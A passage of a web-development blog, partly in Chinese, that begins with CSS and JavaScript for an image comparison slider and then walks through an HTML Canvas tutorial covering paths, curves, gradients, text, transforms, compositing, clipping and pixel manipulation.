    width: 1%; /* 滑块宽度 */
    height: 100%;
    background: rgba(0, 0, 0, 0.66); /* 半透明滑块 */
    cursor: ew-resize;
    z-index: 2;
    }

    .slider .left-image {
    clip-path: inset(0 50% 0 0); /* 初始剪裁右半部分 */
    max-width: 100%;
    display: block;
    margin: 0;
    }

    .slider .right-image {
    clip-path: inset(0 0 0 50%); /* 初始剪裁左半部分 */
    max-width: 100%;
    display: block;
    margin: 0;
    }

    JavaScript

    slider.js 用于实现滑块的逻辑,把它封装起来:

    class ImageSlider {
    constructor(mask, leftImage, rightImage, widthPercent) {
    this.mask = mask;
    this.leftImage = leftImage;
    this.rightImage = rightImage;
    this.isDragging = false;

    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';

// register touch event listeners
this.mask.addEventListener('touchstart', (e) => {
this.isDragging = true;
e.preventDefault(); // suppress default behavior (e.g. scrolling)
});
document.addEventListener('touchend', () => {
this.isDragging = false;
});
document.addEventListener('touchmove', (e) => {
if (this.isDragging) {
this.touchDrag(e);
}
});

// register mouse event listeners
this.mask.addEventListener('mousedown', (e) => {
this.isDragging = true;
e.preventDefault(); // suppress default behavior (e.g. text selection)
    });
    document.addEventListener('mouseup', () => {
    this.isDragging = false;
    });
    document.addEventListener('mousemove', (e) => {
    if (this.isDragging) {
    this.drag(e);
    }
    });
    }

// touch drag handler
touchDrag(e) {
var rect = this.mask.parentNode.getBoundingClientRect();
var x = e.touches[0].clientX - rect.left; // touch position relative to the container
    var widthPercent = (x / rect.width) * 100;
    widthPercent = Math.min(Math.max(widthPercent, 0.5), 99.5);
    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';
    }

// mouse drag handler
drag(e) {
var rect = this.mask.parentNode.getBoundingClientRect();
var x = e.clientX - rect.left; // mouse position relative to the container
    var widthPercent = (x / rect.width) * 100;
    widthPercent = Math.min(Math.max(widthPercent, 0.5), 99.5);
    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';
    }
    }

    function createImageSlider(sliderId, widthPercent=50) {
    const slider = document.getElementById(sliderId);
    const mask = slider.querySelector('.mask');
    const leftImage = slider.querySelector('.left-image');
    const rightImage = slider.querySelector('.right-image');
    return new ImageSlider(mask, leftImage, rightImage, widthPercent);
    }

HTML

Include the CSS and JS:

    <link rel="stylesheet" type="text/css" href="./slider.css">
    <script type="text/javascript" src="./slider.js"></script>

Use the effect:


    <div class="slider" id="slider1">
    <img class="left-image" src="left_1.jpg" alt="jpg" />
    <img class="right-image" src="right_1.jpg" alt="jpg" />
    <div class="mask"></div>
    </div>

    <script>createImageSlider('slider1', 67.5);</script>

    ...

    <div class="slider" id="slidern">
    <img class="left-image" src="left_n.jpg" alt="jpg" />
    <img class="right-image" src="right_n.jpg" alt="jpg" />
    <div class="mask"></div>
    </div>

    <script>createImageSlider('slidern', 48.5);</script>
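With many sliders on a page, one createImageSlider call per id gets repetitive. A small sketch of batch initialization (my own addition, assuming every .slider element carries an id and should start at the default 50/50 split):

<script>
// initialize every .slider on the page with the default 50% split
document.querySelectorAll('.slider').forEach((el) => {
createImageSlider(el.id);
});
</script>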

Demo

Time to bring out my treasured collection!


(nine before/after image pairs, each rendered as a draggable slider)
    ]]>
+
    ]]>
@@ -3729,7 +3729,7 @@ /posts/Web-Html%20Canvas/ - Resources

Main Text

01-Getting Started with Canvas

• Create a canvas:
<canvas id="c" width="600" height="400"></canvas>
• A canvas element generally involves three attributes:

  • id: uniquely identifies the element

  • width: the canvas width

  • height: the canvas height

• Drawing on the canvas:

  • Find the canvas with ID c:
var c = document.getElementById('c')
  • Get the brush, i.e. the rendering context:
var ctx = c.getContext('2d');
  • Draw a rectangle: fillRect(x, y, width, height)
ctx.fillRect(100, 100, 100, 100);

• Complete code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!--
id: uniquely identifies the element
width: the canvas width
height: the canvas height
-->
<canvas id="c" width="600" height="400"></canvas>
<script>
// 1. find the canvas
var c = document.getElementById('c')
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// 3. draw shapes
// 3.1 draw a rectangle: fillRect(x, y, width, height)
ctx.fillRect(100, 100, 100, 100);
</script>
</body>
</html>
• Final result:

    png

02-The Canvas Context and Browser Support

• In browsers without canvas support, c.getContext does not exist, so we can detect that and print a hint:
// check whether getContext exists
if(!c.getContext)
{
console.log("This browser does not support canvas; please install an up-to-date browser");
}
• When canvas is unsupported, the fallback content inside the tag is rendered instead, so we can put something useful there:
<canvas id="c" width="600" height="400">
This browser does not support canvas; please install an up-to-date browser
<a href="https://www.google.cn/chrome/index.html">Download now</a>
</canvas>
• The brush has many properties; console.log(ctx); prints them:

    png


• Complete code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!--
id: uniquely identifies the element
width: the canvas width
height: the canvas height
-->
<canvas id="c" width="600" height="400">
This browser does not support canvas; please install an up-to-date browser
<a href="https://www.google.cn/chrome/index.html">Download now</a>
</canvas>
<script>
// 1. find the canvas
var c = document.getElementById('c')
// check whether getContext exists
if(!c.getContext)
{
console.log("This browser does not support canvas; please install an up-to-date browser");
}
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
console.log(ctx);
// 3. draw shapes
// 3.1 draw a rectangle: fillRect(x, y, width, height)
ctx.fillRect(100, 100, 100, 100);
</script>
</body>
</html>

03-Canvas Fills and Path Drawing

• If the style attribute also sets a size, the canvas is stretched to fit when displayed. (Usually the two sizes are kept the same.)
<canvas id="c" width="600" height="400" style="width: 200px; height: 200px;"></canvas>

png


• ctx.fillRect() draws a filled rectangle, whereas ctx.strokeRect() draws an outlined (stroked) one.
  • strokeRect(x1, y1, width, height)
    • x1 is the distance from the rectangle's top-left corner to the canvas's left edge
    • y1 is the distance from the rectangle's top-left corner to the canvas's top edge
// 3. draw shapes
// 3.2 stroke a rectangle: strokeRect(x1, y1, width, height)
ctx.strokeRect(100, 200, 200, 100);

    png


• Clear a rectangular region of the canvas:
ctx.clearRect(0, 0, c.clientWidth, c.clientHeight);

ctx.strokeRect(100, 200, 200, 100);
ctx.fillRect(200, 150, 200, 100);
let height = 0;
let t1 = setInterval(() => {
height++;
ctx.clearRect(0, 0, c.clientWidth, height);
if (height > c.clientHeight)
{
clearInterval(t1);
}
}, 10);

• Define a rectangle without drawing it:
ctx.rect(100, 200, 300, 300);
• Fill the defined path:
ctx.fill();
• Stroke the defined path:
ctx.stroke();

• ctx.beginPath(); and ctx.closePath(); start and close a path, respectively; with them, a stroke or fill does not re-draw previously defined sub-paths. (Reminiscent of Windows GDI programming.)
    ctx.beginPath();
    ctx.rect(200, 150, 200, 100);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.rect(100, 200, 200, 100);
    ctx.fill();
    ctx.closePath();
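Without the two beginPath() calls here, the second rect() would be added to the same path as the first, so the final fill() would fill both rectangles instead of only the second one.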

04-Drawing Arcs and a Smiley Face

• arc is the method for drawing arcs.
• ctx.arc(centerX, centerY, radius, startAngle, endAngle, counterclockwise (true) or clockwise (false));
ctx.arc(300, 200, 50, 0, Math.PI / 4);
ctx.stroke();
• Use arcs to draw a smiley face; remember to wrap each arc in ctx.beginPath(); and ctx.closePath();, otherwise the paths get connected.
// draw the face
    ctx.beginPath();
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
// draw the mouth
    ctx.beginPath();
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.stroke();
    ctx.closePath();
// draw the left eye
    ctx.beginPath();
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
// draw the right eye
    ctx.beginPath();
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

• The code above is repetitive; use moveTo to jump the pen between shapes instead.
    ctx.beginPath();
// draw the face
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.moveTo(110, 75);
// draw the mouth
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.moveTo(65, 65);
// draw the left eye
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.moveTo(95, 65);
// draw the right eye
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

• Final result:

05-Drawing Polyline Segments

ctx.moveTo(300, 200);
ctx.lineTo(350, 250);
• Move the pen to (300, 200), then draw a line to (350, 250).

• Example:
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    ctx.lineTo(350, 200);
    ctx.lineTo(300, 200);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.moveTo(200, 100);
    ctx.lineTo(250, 150);
    ctx.lineTo(250, 100);
    ctx.lineTo(200, 100);
    ctx.fill();
    ctx.closePath();
• Final result:

06-Drawing Arcs with arcTo

• arcTo controls an arc with 3 points.

png

ctx.beginPath();
// point 1
ctx.moveTo(300, 200);
// points 2 and 3, plus the arc radius
    ctx.arcTo(300, 250, 250, 250, 50);
    ctx.stroke();
    ctx.closePath();

    png

07-A Chat Bubble with Quadratic Bézier Curves


png

• Start point: moveTo(20, 20)
• Control point: the first coordinate pair in quadraticCurveTo(20, 100, 200, 20), i.e. (20, 100)
• End point: the second coordinate pair in the same call, i.e. (200, 20)

• Use quadratic Bézier curves to draw a chat bubble:
    ctx.beginPath();
    ctx.moveTo(200, 300);
    ctx.quadraticCurveTo(150, 300, 150, 200);
    ctx.quadraticCurveTo(150, 100, 300, 100);
    ctx.quadraticCurveTo(450, 100, 450, 200);
    ctx.quadraticCurveTo(450, 300, 250, 300);
    ctx.quadraticCurveTo(250, 350, 150, 350);
    ctx.quadraticCurveTo(200, 350, 200, 300);
    ctx.stroke();
    ctx.closePath();

    png

08-A Heart for a Friend with Cubic Bézier Curves


• Code:
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.bezierCurveTo(350, 150, 400, 200, 300, 250);
    ctx.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke();
    ctx.closePath();

    png

09-Wrapping Paths with Path2D

• Wrap the heart drawn earlier into a reusable path:
var heartPath = new Path2D();
heartPath.moveTo(300, 200);
heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
ctx.stroke(heartPath);
• Or create a path from an SVG path string:
var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
ctx.stroke(polyline);
• Final result:

10-Color and Style Control

• ctx.strokeStyle = "" and ctx.fillStyle = "" set the stroke and fill styles, respectively.
  • "red": a predefined color name.
  • "#ff00ff": a hex color.
  • rgb(255, 0, 0): an RGB color.
  • rgba(200, 200, 255, 0.5): an RGBA color (the fourth value is the alpha).
• ctx.globalAlpha = 0.5; sets the global transparency.

• Demo (a sketch follows):
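A minimal sketch combining these settings (my own demo, standing in for the post's embedded one):

var c = document.getElementById('c');
var ctx = c.getContext('2d');

ctx.globalAlpha = 0.5;                       // everything below is half transparent
ctx.fillStyle = '#ff00ff';                   // hex color
ctx.fillRect(100, 100, 150, 150);
ctx.fillStyle = 'rgba(200, 200, 255, 0.8)';  // RGBA color
ctx.fillRect(180, 180, 150, 150);
ctx.strokeStyle = 'red';                     // predefined color name
ctx.strokeRect(140, 140, 150, 150);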

11-Linear and Radial Gradients


• Linear gradient:
    let lineGradient = ctx.createLinearGradient(100, 200, 400, 500);
    lineGradient.addColorStop(0, "red");
    lineGradient.addColorStop(0.3, "#ffcccc");
    lineGradient.addColorStop(1, "blue");
    ctx.fillStyle = lineGradient;
    ctx.fillRect(100, 200, 300, 300);

    png


• Animated linear gradient:
    let index = 0;

    function render()
    {
    ctx.clearRect(0, 0, 600, 400);
    index += 0.01;
    if (index > 1)
    {
    index = 0;
    }
    let linearGradient = ctx.createLinearGradient(100, 200, 400, 500);
    linearGradient.addColorStop(0, "red");
    linearGradient.addColorStop(index, "#ffcccc");
    linearGradient.addColorStop(1, "blue");
    ctx.fillStyle = linearGradient;
    ctx.fillRect(100, 200, 300, 300);
    requestAnimationFrame(render);
    }

    requestAnimationFrame(render);

• Radial gradient:
let radiaGradient = ctx.createRadialGradient(300, 200, 0, 300, 200, 100);
    radiaGradient.addColorStop(0, "red");
    radiaGradient.addColorStop(0.3, "#ffcccc");
    radiaGradient.addColorStop(1, "blue");
    ctx.fillStyle = radiaGradient;

    ctx.fillRect(0, 0, 600, 400);

    png


• Draw a ball with a radial gradient:
    let radiaGradient = ctx.createRadialGradient(250, 150, 10, 300, 200, 100);
    radiaGradient.addColorStop(0, "#ffcccc");
    radiaGradient.addColorStop(1, "red");
    ctx.fillStyle = radiaGradient;

    ctx.arc(300, 200, 100, 0, Math.PI * 2);
    ctx.fill();

    png

12-Conic Gradient Effect

// conic gradient: createConicGradient(startAngle, x, y)
    let coneGradient = ctx.createConicGradient(Math.PI / 4, 300, 200);
    coneGradient.addColorStop(0, "red");
    coneGradient.addColorStop(0.5, "yellow");
    coneGradient.addColorStop(1, "blue");
    ctx.fillStyle = coneGradient;
    ctx.fillRect(0, 0, 600, 400);

13-Stamp-style Pattern Fills

• createPattern(image, repetition);
  • image may be an Image object or another canvas
  • repetition: repeat, no-repeat, repeat-x, repeat-y
var img = new Image();
img.src = "./imgs/money.png"

img.onload = function(){
// create the pattern object: createPattern(image, repetition)
    var pattern = ctx.createPattern(img, "repeat");
    ctx.fillStyle = pattern;
    ctx.fillRect(0, 0, 600, 400);
    }

14-Line and Dash Styles

    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(200, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(400, 150);
// line width (default 1px)
ctx.lineWidth = 40;
// line cap: butt (flat), round (semicircular), square
ctx.lineCap = "square";
// how segments join: miter (sharp corner), round (rounded corner)
ctx.lineJoin = "round";
    ctx.stroke();

    png


    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(290, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(310, 150);
// line width (default 1px)
ctx.lineWidth = 40;
// line cap: butt (flat), round (semicircular), square
ctx.lineCap = "square";
// how segments join: miter (sharp corner), round (rounded corner)
ctx.lineJoin = "miter";
// limit the miter spike length
ctx.miterLimit = 5;
    ctx.stroke();

    png

    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
// line width (default 1px)
ctx.lineWidth = 2;
// line cap: butt (flat), round (semicircular), square
ctx.lineCap = "square";
// how segments join: miter (sharp corner), round (rounded corner)
ctx.lineJoin = "miter";
// limit the miter spike length
ctx.miterLimit = 5;
// dash pattern
ctx.setLineDash([40, 20]);
ctx.lineDashOffset = 10;
    ctx.stroke();
• ctx.setLineDash([40, 20]) sets the dash pattern; the numbers are the lengths, in pixels, of the dashes and the gaps. Here [40, 20] means: draw a 40px dash, skip a 20px gap, and repeat, producing a dashed line.

• ctx.lineDashOffset = 10 sets the dash offset, i.e. where along the pattern the line starts.

    png


    var c = document.getElementById('c')
    var ctx = c.getContext('2d');
    let index = 0;

function render(){
ctx.clearRect(0, 0, 600, 400);
ctx.beginPath(); // start a fresh path each frame so old subpaths don't accumulate
    index++;
    if (index > 40) {
    index = 0;
    }
    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
// line width (default 1px)
ctx.lineWidth = 2;
// line cap: butt (flat), round (semicircular), square
ctx.lineCap = "square";
// how segments join: miter (sharp corner), round (rounded corner)
ctx.lineJoin = "miter";
// limit the miter spike length
ctx.miterLimit = 5;
// dash pattern
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = index;
    ctx.stroke();
    requestAnimationFrame(render);
    }
    render();

15-Canvas Shadows

• Core code:
// shadow settings
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";
• Complete code:
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');

// shadow settings
ctx.shadowOffsetX = 10;
ctx.shadowOffsetY = 10;
ctx.shadowBlur = 5;
ctx.shadowColor = "rgba(255, 100, 100, 1)";

// global transparency
ctx.globalAlpha = 0.5;
// start point
var heartPath = new Path2D();
heartPath.moveTo(300, 200);
// 2 control points and 1 end point
heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.strokeStyle = "red"
    ctx.stroke(heartPath);

    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.strokeStyle = "#ff00ff";

    ctx.stroke(chatPath);
    ctx.fillStyle = "rgba(255,200,200,0.3)";
    ctx.fill(heartPath);
// create a polyline from an SVG path string
var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
ctx.strokeStyle = "rgb(0, 0, 255)";

    ctx.stroke(polyline);

    png

16-Three Ways to Draw Images

// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');

// load the image
let img = new Image();
img.src = "./imgs/girl.webp";
img.onload = function (){
// variant 1: (image, x, y)
// ctx.drawImage(img, 0, 0);
// variant 2, with scaling: (image, x, y, targetWidth, targetHeight)
ctx.drawImage(img, 0, 0, 600, 400);
// variant 3, with cropping: the four values after img are the crop origin and size on the source image; the last four are the destination origin and size on the canvas
ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
}

17-Drawing Video onto Canvas with a Watermark

<video src="./imgs/mov_bbb.mp4" controls></video>
• The <video> element displays video in a page.

We can paint video frames onto a canvas and overlay a watermark on top.

    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <canvas id="c" width="600" height="400"></canvas>
    <video style="display: none;" src="./imgs/mov_bbb.mp4" controls></video>
    <button id="btn">播放 / 暂停</button>
<script>
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');

// the video element
var video = document.querySelector("video");

// the play button
let btn = document.querySelector("#btn");
btn.onclick = function(){
video.play();
render();
}

// the logo image used as watermark
let img = new Image();
img.src = "./imgs/logo.png";

    function render(){
    ctx.drawImage(video, 0, 0, 600, 400);
    ctx.drawImage(img, 400, 350, 200, 50);
    requestAnimationFrame(render);
    }
    </script>
    </body>

18-Drawing and Aligning Text

• Text color
ctx.strokeStyle = "#f00";
• Font size and family
ctx.font = "100px Microsoft YaHei";
• Fill-render text
  • fillText(text, startX, startY, maxWidth)
ctx.fillText("你好", 300, 200);
• Horizontal alignment: textAlign = start (default), end, left, right, center
ctx.textAlign = "center";
• Baseline alignment: textBaseline = top, bottom, alphabetic, middle, ...
ctx.textBaseline = "middle";
• Text direction
ctx.direction = "rtl";
• Measure text width in advance
let text = ctx.measureText("你好!");
console.log(text);
• Stroke the text outline
ctx.strokeText("你好!", 300, 200);
• Complete code
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// text color, size / font
ctx.strokeStyle = "#f00";
ctx.font = "100px Microsoft YaHei";
// fill-render text
// fillText(text, startX, startY, maxWidth)
// ctx.fillText("你好", 300, 200);
// horizontal alignment: start (default), end, left, right, center
ctx.textAlign = "center";
// baseline alignment: top, bottom, alphabetic, middle, ...
ctx.textBaseline = "middle";
// text direction
ctx.direction = "rtl";
// measure text width in advance
let text = ctx.measureText("你好!");
console.log(text);
ctx.strokeText("你好!", 300, 200);
    ctx.arc(300, 200, 5, 0, 2 * Math.PI);
    ctx.fill();

    png

19-Translate, Scale and Rotate Transforms

• ctx.translate(100, 100);
  • moves the coordinate origin 100px to the right and 100px down.
• ctx.rotate(Math.PI / 6);
  • rotates the coordinate system 30° clockwise (positive angles are clockwise on canvas).
• ctx.scale(5, 2);
  • scales the coordinate system by 5× along x and 2× along y.

• Complete code:
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// 3. draw shapes
// 3.1 fillRect(x, y, width, height), after transforming the coordinate system
ctx.translate(100, 100);
// rotate, then stretch the coordinate system
ctx.rotate(Math.PI / 6);
ctx.scale(5, 2);
    ctx.fillRect(0, 0, 50, 50);
    ctx.translate(100, 100);
    ctx.fillRect(0, 0, 50, 50);

    png

20-Image Transforms with the transform Matrix

• transform(a, b, c, d, e, f) edits the transformation matrix directly:
  • $\begin{bmatrix} a & c & e \\ b & d & f \\ 0 & 0 & 1 \end{bmatrix}$
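Concretely (a standard property of this matrix form, not spelled out in the post), a point $(x, y)$ is mapped to

$$x' = a\,x + c\,y + e, \qquad y' = b\,x + d\,y + f$$

so the transform(1, 1, -1, 1, 50, 0) call below sends $(x, y)$ to $(x - y + 50,\ x + y)$: a 45° rotation combined with a $\sqrt{2}$ scaling, followed by a 50px horizontal shift.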
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// 3. draw shapes
// shear both axes and shift 50px horizontally (see the worked mapping above)
ctx.transform(1, 1, -1, 1, 50, 0);
    ctx.fillRect(0, 0, 500, 50);

    png

21-Canvas Compositing Modes
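globalCompositeOperation controls how new drawing is combined with the pixels already on the canvas: the default source-over simply paints on top; source-in, used below, keeps only the part of the new shape that overlaps existing content and makes everything else transparent; destination-out (see the scratch card in the next lesson) erases existing pixels wherever the new shape covers them.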

// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// 3. draw shapes
ctx.fillStyle = "#F00";
ctx.fillRect(300, 200, 100, 100);
ctx.globalCompositeOperation = "source-in";
    ctx.fillStyle = "#00F";
    ctx.fillRect(250, 150, 100, 100);

    png

22-A Scratch Card via Compositing

    #ggk{
    width: 600px;
    height: 400px;
    font-size: 30px;
    font-weight: 900;
    text-align: center;
    line-height: 400px;
    overflow: hidden;
    position: absolute;
    left: 0;
    top: 0;
    }
    <div id="ggk">谢谢惠顾</div>
    <canvas style="position: absolute; border: 1px solid #ccc; z-index: 2;" id="c" width="600" height="400"></canvas>
• Use a <canvas> to cover the text behind the scratch card.

// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// 3. draw the cover image
let img = new Image();
img.src = "./imgs/m2.png";
    img.onload = function(){
    ctx.drawImage(img, 0, 0, 600, 400);
    }
    var isDraw = false;
    c.onmousedown = function(){
    isDraw = true;
    }
    c.onmouseup = function(){
    isDraw = false;
    }
c.onmousemove = function (e) {
if (isDraw) {
var x = e.pageX;
var y = e.pageY;

ctx.globalCompositeOperation = "destination-out";
ctx.beginPath(); // start a new circle each move, otherwise all previous arcs are refilled
ctx.arc(x, y, 20, 0, 2 * Math.PI);
ctx.fill();
}
};

    let random = Math.random();
    if (random < 0.1) {
    var ggkDiv = document.querySelector("#ggk");
ggkDiv.innerHTML = "Congratulations, you won an iPhone 14 Pro!";
    }
• Pressing the mouse button and moving draws circles at the cursor, producing the scratch-off effect.

• ctx.globalCompositeOperation = "destination-out"; makes the overlap between the circles and the cover layer transparent.


• Final result:

23-Clipping Paths

A clipping path is built like any other canvas path, but it acts as a mask that hides unwanted content: nothing outside the path is drawn onto the canvas.

• clip() turns the currently built path into the current clipping path.
// 1. find the canvas
var c = document.getElementById('c')
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// start point
var heartPath = new Path2D();
heartPath.moveTo(300, 200);
// 2 control points and 1 end point
heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.clip(chatPath);
    ctx.fill(heartPath);

// load the image
let img = new Image();
img.src = "./imgs/girl.webp";
img.onload = function (){
// variant 1: (image, x, y)
// ctx.drawImage(img, 0, 0);
// variant 2, with scaling: (image, x, y, targetWidth, targetHeight)
ctx.drawImage(img, 0, 0, 600, 400);
// variant 3, with cropping: source crop origin and size, then destination origin and size
ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
// outline the chat bubble
    ctx.lineWidth = 20;
    ctx.stroke(chatPath);
    }

    png

24-Saving and Restoring State

• save() pushes the current state onto a stack.
• restore() pops the most recent state off the stack and applies it.
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');
// 3. draw shapes
    ctx.fillStyle = "red";
    ctx.fillRect(0, 0, 100, 100);
    ctx.save();

    ctx.fillStyle = "blue";
    ctx.fillRect(100, 100, 100, 100);
    ctx.save();

    ctx.fillStyle = "yellow";
    ctx.fillRect(200, 200, 100, 100);
    ctx.save();

    ctx.fillStyle = "green";
    ctx.fillRect(300, 300, 100, 100);
    ctx.save();

    ctx.restore();
    ctx.fillRect(400, 400, 100, 100);

    ctx.restore();
    ctx.fillRect(500, 500, 100, 100);

    ctx.restore();
    ctx.fillRect(600, 600, 100, 100);

    ctx.restore();
    ctx.fillRect(700, 700, 100, 100);
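Reading the stack: the four save() calls push snapshots with fillStyle red, blue, yellow and green, in that order, so the restores pop them back in reverse: the first restore re-applies the green snapshot (no visible change), then yellow, blue and red come back for the following fillRect calls.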

    png

25-Pixel Manipulation

    png

// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');

// load the image
let img = new Image();
img.src = "imgs/girl.webp";
img.onload = function (){
ctx.drawImage(img, 0, 0, 600, 400);

let imageData = ctx.getImageData(0, 0, 600, 400);
console.log(imageData);
// walk the pixel data (4 bytes per pixel: R, G, B, A)
    for (let i = 0; i < imageData.data.length; i+= 4)
    {
let gray = imageData.data[i] * 0.3 + imageData.data[i + 1] * 0.59 + imageData.data[i + 2] * 0.11; // classic luma weights for R, G, B
    imageData.data[i] = gray;
    imageData.data[i + 1] = gray;
    imageData.data[i + 2] = gray;
    imageData.data[i + 3] = 255;
    }
    ctx.putImageData(imageData, 0, 0, 0, 0, 300, 400);
    }
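One caveat worth knowing (general canvas behavior, not specific to this post): if the image was loaded from another origin without CORS headers, the canvas becomes tainted and getImageData() throws a SecurityError, so pixel manipulation only works with same-origin or CORS-enabled images.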

    png

26-Higher-level Wrapping: Drawable, Interactive Elements

• This lesson is, I suppose, about applying object-oriented ideas.

• Create a Heart class in JavaScript, design its constructor(), and render the shape in a draw() method.
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    }
    draw(){
    ctx.save();
    ctx.fillStyle = "red";
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.draw();
• Wire up onmousemove so the shape changes color when the mouse moves over it:
// 1. find the canvas
var c = document.getElementById('c');
// 2. get the brush (2D rendering context)
var ctx = c.getContext('2d');

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.color = "red";
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    c.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    let isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (isIn)
    {
    this.color = "blue";
    }else{
    this.color = "red";
    }
    }
    }
    draw(){
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    function render(){
    ctx.clearRect(0, 0, c.width, c.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

An even slicker, event-driven way of writing it... which I haven't quite mastered yet.

• Create a Heart object and register onHover and onLeave handlers: the heart turns blue while hovered and back to red when the mouse leaves.

